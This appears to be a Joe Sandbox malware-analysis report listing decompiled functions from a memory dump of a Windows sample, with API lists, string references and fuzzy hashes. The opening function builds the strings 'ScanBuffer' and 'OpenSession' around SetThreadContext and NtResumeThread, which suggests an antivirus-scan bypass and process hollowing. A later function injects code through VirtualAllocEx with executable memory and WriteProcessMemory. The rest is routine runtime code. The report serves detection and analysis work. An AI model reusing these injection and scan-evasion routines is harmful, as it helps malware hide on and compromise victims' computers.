										_push(0x2734460);
										_push( *0x2744438);
										_push("ScanBuffer");
										E02724C24();
										E02724A98( &_v224, E02724D64(_v228));
										_push(_v224);
										_t508 =  *0x2744438; // 0x0
										E02724BB0( &_v236, _t508, 0x2734460);
										E02724A98( &_v232, E02724D64(_v236));
										_pop(_t567);
										E02733690(_v232, _t495, _t567, 0);
										_push(0x2734460);
										_push( *0x2744438);
										_push("OpenSession");
										E02724C24();
										E02724A98( &_v240, E02724D64(_v244));
										_push(_v240);
										_t509 =  *0x2744438; // 0x0
										E02724BB0( &_v252, _t509, 0x2734460);
										E02724A98( &_v248, E02724D64(_v252));
										_pop(_t572);
										E02733690(_v248, _t495, _t572, 0);
										_t349 =  *0x2744304; // 0x0
										SetThreadContext(_t349, 0x2744354);
										_push(0x2734460);
										_push( *0x2744438);
										_push("ScanBuffer");
										E02724C24();
										E02724A98( &_v256, E02724D64(_v260));
										_push(_v256);
										_t510 =  *0x2744438; // 0x0
										E02724BB0( &_v268, _t510, 0x2734460);
										E02724A98( &_v264, E02724D64(_v268));
										_pop(_t577);
										E02733690(_v264, _t495, _t577, 0);
										_push(0x2734460);
										_push( *0x2744438);
										_push("OpenSession");
										E02724C24();
										E02724A98( &_v272, E02724D64(_v276));
										_push(_v272);
										_t511 =  *0x2744438; // 0x0
										E02724BB0( &_v284, _t511, 0x2734460);
										E02724A98( &_v280, E02724D64(_v284));
										_pop(_t582);
										E02733690(_v280, _t495, _t582, 0);
										_t379 =  *0x2744304; // 0x0
										NtResumeThread(_t379);
										E02722C5C(_t495);
									}
								}
							}
						}
					}
					goto L19;
				}
			}

0x0273398e
0x0273398e
0x02733991
0x02733993
0x02733993
0x0273440d
0x0273440f
0x02734412
0x02734415
0x0273442a
0x02733998
0x02733998
0x0273399a
0x0273399c
0x0273399d
0x00000000
0x0273399f
0x0273399f
0x027339a0
0x027339a1
0x027339a3
0x027339a9
0x027339b0
0x027339b1
0x027339b6
0x027339b9
0x027339c1
0x027339c6
0x027339c7
0x027339ce
0x027339eb
0x027339d0
0x027339da
0x027339da
0x027339f0
0x027339f5
0x027339fb
0x02733a08
0x02733a1a
0x02733a22
0x02733a26
0x02733a31
0x02733a43
0x02733a4b
0x02733a4c
0x02733a53
0x02733a59
0x02733a63
0x02733a6d
0x02733a6e
0x02733a6f
0x02733a77
0x02733a7b
0x02733a82
0x02733a87
0x02733a92
0x02733aa4
0x02733ab5
0x02733aba
0x02733ac4
0x02733ac9
0x02733acf
0x02733adc
0x02733aee
0x02733af6
0x02733afa
0x02733b05
0x02733b17
0x02733b1f
0x02733b20
0x02733b25
0x02733b2a
0x02733b30
0x02733b3d
0x02733b4f
0x02733b57
0x02733b5b
0x02733b66
0x02733b78
0x02733b80
0x02733b81
0x02733bae
0x02733bb4
0x02733bc3
0x02733bd0
0x02733bd6
0x02733bdb
0x02733be1
0x02733bee
0x02733c00
0x02733c08
0x02733c0c
0x02733c17
0x02733c29
0x02733c31
0x02733c32
0x02733c37
0x02733c3c
0x02733c42
0x02733c4f
0x02733c61
0x02733c69
0x02733c6d
0x02733c78
0x02733c8a
0x02733c92
0x02733c93
0x02733ca4
0x02733cad
0x02733cb3
0x02733cb8
0x02733cc0
0x02733cc6
0x02733dfc
0x02733e05
0x02733e0e
0x02733e19
0x02733ccc
0x02733ccc
0x02733cd1
0x02733cd7
0x02733ce4
0x02733cf6
0x02733cfe
0x02733d02
0x02733d0d
0x02733d1f
0x02733d27
0x02733d28
0x02733d2d
0x02733d32
0x02733d38
0x02733d45
0x02733d57
0x02733d5f
0x02733d63
0x02733d6e
0x02733d80
0x02733d88
0x02733d89
0x02733d8e
0x02733d97
0x02733da4
0x02733dd8
0x02733de3
0x02733dee
0x02733da6
0x02733dad
0x02733db6
0x02733dbf
0x02733dca
0x02733dca
0x02733da4
0x02733e25
0x02733e32
0x02733e34
0x02733e3c
0x02733e42
0x02733e48
0x02733e4d
0x02733e53
0x02733e60
0x02733e72
0x02733e7a
0x02733e81
0x02733e8c
0x02733ea1
0x02733ea9
0x02733eaa
0x02733eaf
0x02733eb4
0x02733eba
0x02733eca
0x02733ee2
0x02733eed
0x02733ef4
0x02733eff
0x02733f17
0x02733f22
0x02733f23
0x02733f28
0x02733f2d
0x02733f37
0x02733f3e
0x02733f43
0x02733f48
0x02733f4e
0x02733f51
0x02733f56
0x02733f5c
0x02733f6c
0x02733f84
0x02733f8f
0x02733f96
0x02733fa1
0x02733fb9
0x02733fc4
0x02733fc5
0x02733fca
0x02733fcf
0x02733fd5
0x02733fe5
0x02733ffd
0x02734008
0x0273400f
0x0273401a
0x02734032
0x0273403d
0x0273403e
0x02734047
0x02734048
0x02734049
0x02734051
0x02734055
0x02734061
0x02734067
0x02734067
0x0273406c
0x02734071
0x02734077
0x02734087
0x0273409f
0x027340aa
0x027340b1
0x027340bc
0x027340d4
0x027340df
0x027340e0
0x027340e5
0x027340ea
0x027340f0
0x02734100
0x02734118
0x02734123
0x0273412a
0x02734135
0x0273414d
0x02734158
0x02734159
0x02734169
0x0273417e
0x02734188
0x02734193
0x02734198
0x0273419e
0x027341a8
0x027341b2
0x027341b8
0x027341be
0x027341c4
0x027341cc
0x027341d5
0x027341db
0x027341e1
0x027341e6
0x027341f4
0x027341f9
0x027341fe
0x02734204
0x02734214
0x0273422c
0x02734237
0x0273423e
0x02734249
0x02734261
0x0273426c
0x0273426d
0x02734272
0x02734277
0x0273427d
0x0273428d
0x027342a5
0x027342b0
0x027342b7
0x027342c2
0x027342da
0x027342e5
0x027342e6
0x027342f0
0x027342f6
0x027342fb
0x02734300
0x02734306
0x02734316
0x0273432e
0x02734339
0x02734340
0x0273434b
0x02734363
0x0273436e
0x0273436f
0x02734374
0x02734379
0x0273437f
0x0273438f
0x027343a7
0x027343b2
0x027343b9
0x027343c4
0x027343dc
0x027343e7
0x027343e8
0x027343ed
0x027343f3
0x02734402
0x02734407
0x02733e25
0x02733bd0
0x02733bae
0x02733a92
0x00000000
0x02733a63

APIs

InetIsOffline.URL(00000000,00000000,0273442B,?,?,?,00000000,00000000), ref: 027339C7

Strings

OpenSession, xrefs: 027339FB, 02733B30, 02733C42, 02733D38, 02733EBA, 02733FD5, 027340F0, 0273427D, 0273437F
WriteProcessMemory, xrefs: 02734183
teSe, xrefs: 027339D5
ScanBuffer, xrefs: 02733ACF, 02733BE1, 02733CD7, 02733E53, 02733F5C, 02734077, 02734204, 02734306
KernelBase, xrefs: 02734164

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: InetOffline
String ID: KernelBase$OpenSession$ScanBuffer$WriteProcessMemory$teSe
API String ID: 3180263700-3519499064
Opcode ID: 8182b8f3a2ebf986e28caea2ad42e5ccf13ccf59850ab6136b51c81095818e48
Instruction ID: 01130101965cdfa09d51fc25af28a5f697ecf548e384dcb79e69c6a1ece7223e
Opcode Fuzzy Hash: 8182b8f3a2ebf986e28caea2ad42e5ccf13ccf59850ab6136b51c81095818e48
Instruction Fuzzy Hash: E6428075B40218EBDB12EB68ECA4FCE73FAFB44710F5184A6E104A7205CB34AE499F54

Uniqueness

Uniqueness Score: -1.00%

Function 02725B48 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E02725B48(CHAR* __eax, int __edx) {
				CHAR* _v8;
				int _v12;
				CHAR* _v16;
				void* _v20;
				struct _WIN32_FIND_DATAA _v338;
				char _v599;
				void* _t102;
				intOrPtr* _t103;
				CHAR* _t106;
				CHAR* _t108;
				char* _t109;
				void* _t110;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_v20 = GetModuleHandleA("kernel32.dll");
				if(_v20 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t108 =  &(_v8[2]);
						goto L10;
					} else {
						if(_v8[1] == 0x5c) {
							_t109 = E02725B28( &(_v8[2]));
							if( *_t109 != 0) {
								_t17 = _t109 + 1; // 0x1
								_t108 = E02725B28(_t17);
								if( *_t108 != 0) {
									L10:
									_t102 = _t108 - _v8;
									lstrcpynA( &_v599, _v8, _t102 + 1);
									while( *_t108 != 0) {
										_t106 = E02725B28( &(_t108[1]));
										if(_t106 - _t108 + _t102 + 1 <= 0x105) {
											lstrcpynA( &(( &_v599)[_t102]), _t108, _t106 - _t108 + 1);
											_v20 = FindFirstFileA( &_v599,  &_v338);
											if(_v20 != 0xffffffff) {
												FindClose(_v20);
												if(lstrlenA( &(_v338.cFileName)) + _t102 + 1 + 1 <= 0x105) {
													 *((char*)(_t110 + _t102 - 0x253)) = 0x5c;
													lstrcpynA( &(( &(( &_v599)[_t102]))[1]),  &(_v338.cFileName), 0x105 - _t102 - 1);
													_t102 = _t102 + lstrlenA( &(_v338.cFileName)) + 1;
													_t108 = _t106;
													continue;
												}
											}
										}
										goto L17;
									}
									lstrcpynA(_v8,  &_v599, _v12);
								}
							}
						}
					}
				} else {
					_t103 = GetProcAddress(_v20, "GetLongPathNameA");
					if(_t103 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v599);
						_push(_v8);
						if( *_t103() == 0) {
							goto L4;
						} else {
							lstrcpynA(_v8,  &_v599, _v12);
						}
					}
				}
				L17:
				return _v16;
			}

0x02725b54
0x02725b57
0x02725b5d
0x02725b6a
0x02725b71
0x02725bb6
0x02725bbc
0x02725bf9
0x00000000
0x02725bbe
0x02725bc5
0x02725bd6
0x02725bdb
0x02725be1
0x02725be9
0x02725bee
0x02725bfc
0x02725bfe
0x02725c10
0x02725cc1
0x02725c22
0x02725c30
0x02725c46
0x02725c5e
0x02725c65
0x02725c6b
0x02725c87
0x02725c89
0x02725cab
0x02725cbd
0x02725cbf
0x00000000
0x02725cbf
0x02725c87
0x02725c65
0x00000000
0x02725c30
0x02725cd9
0x02725cd9
0x02725bee
0x02725bdb
0x02725bc5
0x02725b73
0x02725b81
0x02725b85
0x00000000
0x02725b87
0x02725b87
0x02725b92
0x02725b96
0x02725b9b
0x00000000
0x02725b9d
0x02725bac
0x02725bac
0x02725b9b
0x02725b85
0x02725cde
0x02725ce7

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02726ED0,02720000,027407B4), ref: 02725B65
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02725B7C
lstrcpynA.KERNEL32(?,?,?), ref: 02725BAC
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02726ED0,02720000,027407B4), ref: 02725C10
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02726ED0,02720000,027407B4), ref: 02725C46
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02726ED0,02720000,027407B4), ref: 02725C59
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02726ED0,02720000,027407B4), ref: 02725C6B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02726ED0,02720000,027407B4), ref: 02725C77
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02726ED0,02720000), ref: 02725CAB
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02726ED0), ref: 02725CB7
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02725CD9

Strings

GetLongPathNameA, xrefs: 02725B73
\, xrefs: 02725C89
kernel32.dll, xrefs: 02725B60

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: b77559fa49e1ef3e342b942c9080303ff5e5d0fae335a8604531b02052f035e8
Instruction ID: baa6d86528c77c53c54c7c5d7122517bea199eb24648b39611595f1477f3dfa5
Opcode Fuzzy Hash: b77559fa49e1ef3e342b942c9080303ff5e5d0fae335a8604531b02052f035e8
Instruction Fuzzy Hash: 3F416FB1E00269ABDB11DEE8CC88ADFB7FDAF08340F5455A5E548E7201E7709A888F54

Uniqueness

Uniqueness Score: -1.00%

Function 02725E18 Relevance: 15.1, APIs: 10, Instructions: 98
stringlibrarythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02725E18() {
				void* _t32;
				CHAR* _t56;
				CHAR* _t57;
				struct HINSTANCE__* _t64;
				void* _t66;

				lstrcpynA(_t66 - 0x11d,  *(_t66 - 4), 0x105);
				GetLocaleInfoA(GetThreadLocale(), 3, _t66 - 0xd, 5);
				_t64 = 0;
				if( *(_t66 - 0x11d) == 0 ||  *(_t66 - 0xd) == 0 &&  *(_t66 - 0x12) == 0) {
					L14:
					return _t64;
				} else {
					_t56 =  &((_t66 - 0x11d)[lstrlenA(_t66 - 0x11d)]);
					L5:
					if( *_t56 != 0x2e && _t56 != _t66 - 0x11d) {
						_t56 = _t56 - 1;
						goto L5;
					}
					_t32 = _t66 - 0x11d;
					if(_t56 != _t32) {
						_t57 =  &(_t56[1]);
						if( *(_t66 - 0x12) != 0) {
							lstrcpynA(_t57, _t66 - 0x12, 0x105 - _t57 - _t32);
							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
						}
						if(_t64 == 0 &&  *(_t66 - 0xd) != 0) {
							lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
							if(_t64 == 0) {
								 *((char*)(_t66 - 0xb)) = 0;
								lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
								_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
							}
						}
					}
					goto L14;
				}
			}

0x02725e28
0x02725e3b
0x02725e40
0x02725e49
0x02725f32
0x02725f39
0x02725e5f
0x02725e73
0x02725e78
0x02725e7b
0x02725e77
0x00000000
0x02725e77
0x02725e87
0x02725e8f
0x02725e95
0x02725e9a
0x02725ead
0x02725ec2
0x02725ec2
0x02725ec6
0x02725ee5
0x02725efa
0x02725efe
0x02725f00
0x02725f1b
0x02725f30
0x02725f30
0x02725efe
0x02725ec6
0x00000000
0x02725e8f

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02725E28
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02725E35
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02725E3B
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02725E66
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02725EAD
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02725EBD
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02725EE5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02725EF5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02725F1B
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02725F2B

Strings

Software\Borland\Delphi\Locales, xrefs: 02725D78
Software\Borland\Locales, xrefs: 02725D3C, 02725D5A

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: ce2ff861a8847cbd52f8eb7497b8c674a4da7b805932cba2d130268b09d95d30
Instruction ID: 3cd1f73d2a112775a039a6d6e4f69336e003621b0ade7ce6ca82165709a6c452
Opcode Fuzzy Hash: ce2ff861a8847cbd52f8eb7497b8c674a4da7b805932cba2d130268b09d95d30
Instruction Fuzzy Hash: D8311071E502AC7AFB2AD6B49C89BDF67ED9B04380F8441A1E648E6181D674DA8C8F50

Uniqueness

Uniqueness Score: -1.00%

Function 02735A40 Relevance: 3.1, APIs: 2, Instructions: 57
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E02735A40(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _t11;
				char _t16;
				void* _t25;
				intOrPtr _t33;
				void* _t36;
				void* _t38;
				intOrPtr _t41;

				_push(0);
				_push(0);
				_push(0);
				_t25 = __edx;
				_t38 = __eax;
				_push(_t41);
				_push(0x2735ac6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				E02724A98( &_v12, __edx);
				_t11 = _v12;
				if(_t11 != 0) {
					_t11 =  *((intOrPtr*)(_t11 - 4));
				}
				_t36 = VirtualAllocEx(_t38, 0, _t11 + 1, 0x3000, 0x40);
				E02724A98( &_v16, _t25);
				_t16 = _v16;
				if(_t16 != 0) {
					_t16 =  *((intOrPtr*)(_t16 - 4));
				}
				WriteProcessMemory(_t38, _t36, _t25, _t16 + 1,  &_v8);
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x2735acd);
				return E027248C4( &_v16, 2);
			}

0x02735a43
0x02735a45
0x02735a47
0x02735a4c
0x02735a4e
0x02735a52
0x02735a53
0x02735a58
0x02735a5b
0x02735a63
0x02735a68
0x02735a6d
0x02735a72
0x02735a72
0x02735a85
0x02735a8c
0x02735a91
0x02735a96
0x02735a9b
0x02735a9b
0x02735aa6
0x02735aad
0x02735ab0
0x02735ab3
0x02735ac5

APIs

VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,02735AC6,?,?,?,?,00000000,00000000,00000000), ref: 02735A80
WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,00000000,02735AC6), ref: 02735AA6

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: AllocMemoryProcessVirtualWrite
String ID:
API String ID: 645232735-0
Opcode ID: 3ecb7264f9815bd4c26a715f9bd307361975105b87d0ee49cc23535be279e042
Instruction ID: 0f3005ebd92ff71f855ce537ed5977e3ef0ec24fbbb162140f50ca4089606ae8
Opcode Fuzzy Hash: 3ecb7264f9815bd4c26a715f9bd307361975105b87d0ee49cc23535be279e042
Instruction Fuzzy Hash: DB01B1717003587FF712DA65CC85F6ABBADDB89B04F914476F941E7280DA70EE088A68

Uniqueness

Uniqueness Score: -1.00%

Function 0272823A Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0272823A(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t48;
				intOrPtr _t50;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t48 = _v24;
				_t31 = E02725824(_v28, _t48, _v16, 0);
				_t39 = _a8;
				 *_t39 = _t31;
				 *((intOrPtr*)(_t39 + 4)) = _t48;
				_t50 = _v24;
				_t34 = E02725824(_v28, _t50, _v20, 0);
				_t40 = _a12;
				 *_t40 = _t34;
				 *((intOrPtr*)(_t40 + 4)) = _t50;
				return _t26;
			}

0x02728243
0x02728248
0x0272824a
0x0272824a
0x0272825d
0x0272826c
0x0272826f
0x0272827c
0x0272827f
0x02728284
0x02728287
0x02728289
0x02728296
0x02728299
0x0272829e
0x027282a1
0x027282a3
0x027282ac

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0272825D

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 367c99cdfc9f0c1ef2312e8478730ab1e681b7ee7aadba308f6e37ae4c7afc6a
Instruction ID: 76f6f7291f3cb3d87c6ab30229e91d2fe8e40659b8b523c8240aab1ecf51203c
Opcode Fuzzy Hash: 367c99cdfc9f0c1ef2312e8478730ab1e681b7ee7aadba308f6e37ae4c7afc6a
Instruction Fuzzy Hash: E611D2B5E00209AF9B05CF99C881DAFF7F9EFC8300B54C569E505EB254E6719E058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0272A9B8 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0272A9B8(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E027248F4(_t10, _t18);
				}
				return E02724990(_t10, _t5 - 1,  &_v260, _t19);
			}

0x0272a9c3
0x0272a9c5
0x0272a9d6
0x0272a9db
0x0272a9dd
0x00000000
0x0272a9f5
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0272A9D6

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 970b2ee4ffdceb79d1b7860d65872896ae916278293f28f4050da8f3dc609713
Instruction ID: 4a271d60a148989f0249b43b44149fc4efbd7c19b629a4b6e3f09b7c558d5f62
Opcode Fuzzy Hash: 970b2ee4ffdceb79d1b7860d65872896ae916278293f28f4050da8f3dc609713
Instruction Fuzzy Hash: 35E0D87170422417D311A55D5C959FA725DEB58310F00427BFD89D7340EDA09DC84EE5

Uniqueness

Uniqueness Score: -1.00%

Function 0272B938 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0272B938() {
				char _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _t7;
				struct _OSVERSIONINFOA* _t18;

				_t18->dwOSVersionInfoSize = 0x94;
				_t7 = GetVersionExA(_t18);
				if(_t7 != 0) {
					 *0x27407e4 = _v132;
					 *0x27407e8 = _v144;
					 *0x27407ec = _v140;
					if( *0x27407e4 != 1) {
						 *0x27407f0 = _v136;
					} else {
						 *0x27407f0 = _v136 & 0x0000ffff;
					}
					return E02724B10(0x27407f4, 0x80,  &_v128);
				}
				return _t7;
			}

0x0272b93e
0x0272b946
0x0272b94d
0x0272b953
0x0272b95c
0x0272b965
0x0272b971
0x0272b987
0x0272b973
0x0272b97c
0x0272b97c
0x00000000
0x0272b99a
0x0272b9a5

APIs

GetVersionExA.KERNEL32(?,0273F106,00000000,0273F11E), ref: 0272B946

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: beea5810d5671746362daae3c9a1543c7149b00fea192533ae4e68040d6e4eb7
Instruction ID: d1f97290cb88ce09acb35ef8159027be95d3632b76f0a09ef948f82dec5d447b
Opcode Fuzzy Hash: beea5810d5671746362daae3c9a1543c7149b00fea192533ae4e68040d6e4eb7
Instruction Fuzzy Hash: D3F0B7B89893129FC759DF28D540B19B7E5EB48314F009D2AEAD8D7384D7349419CF93

Uniqueness

Uniqueness Score: -1.00%

Function 0272AA04 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0272AA04(int __eax, signed int __ecx, int __edx) {
				char _v16;
				signed int _t5;
				signed int _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16 & 0x000000ff;
				}
				return _t5;
			}

0x0272aa07
0x0272aa08
0x0272aa1e
0x0272aa26
0x0272aa20
0x0272aa20
0x0272aa20
0x0272aa2c

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0272C01E,00000000,0272C237,?,?,00000000,00000000), ref: 0272AA17

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: bb273cdce3cd20e8bf6165c07a061c1bd383eb027c3837f97ac3610f7129eeb8
Instruction ID: a33c10a12db69622b6aaace2d7e0d577370a5cc780eb7e9bbe78409a7697da32
Opcode Fuzzy Hash: bb273cdce3cd20e8bf6165c07a061c1bd383eb027c3837f97ac3610f7129eeb8
Instruction Fuzzy Hash: 29D05EA631E2702BA310515A2E84D7B5AECCFCA7A2F00443AF548D6100D200CC099775

Uniqueness

Uniqueness Score: -1.00%

Function 02729438 Relevance: 1.5, APIs: 1, Instructions: 6
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02729438() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear & 0x0000ffff;
			}

0x0272943c
0x02729448

APIs

GetLocalTime.KERNEL32 ref: 0272943C

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 6dd34a849c2f346cf2e2f5751c819418c1277ca2abf746d71a13b971fa9c721c
Instruction ID: da339e72a965b418ed8e3a03227a61a6795c5409d01eae5a9667ebbd94f05870
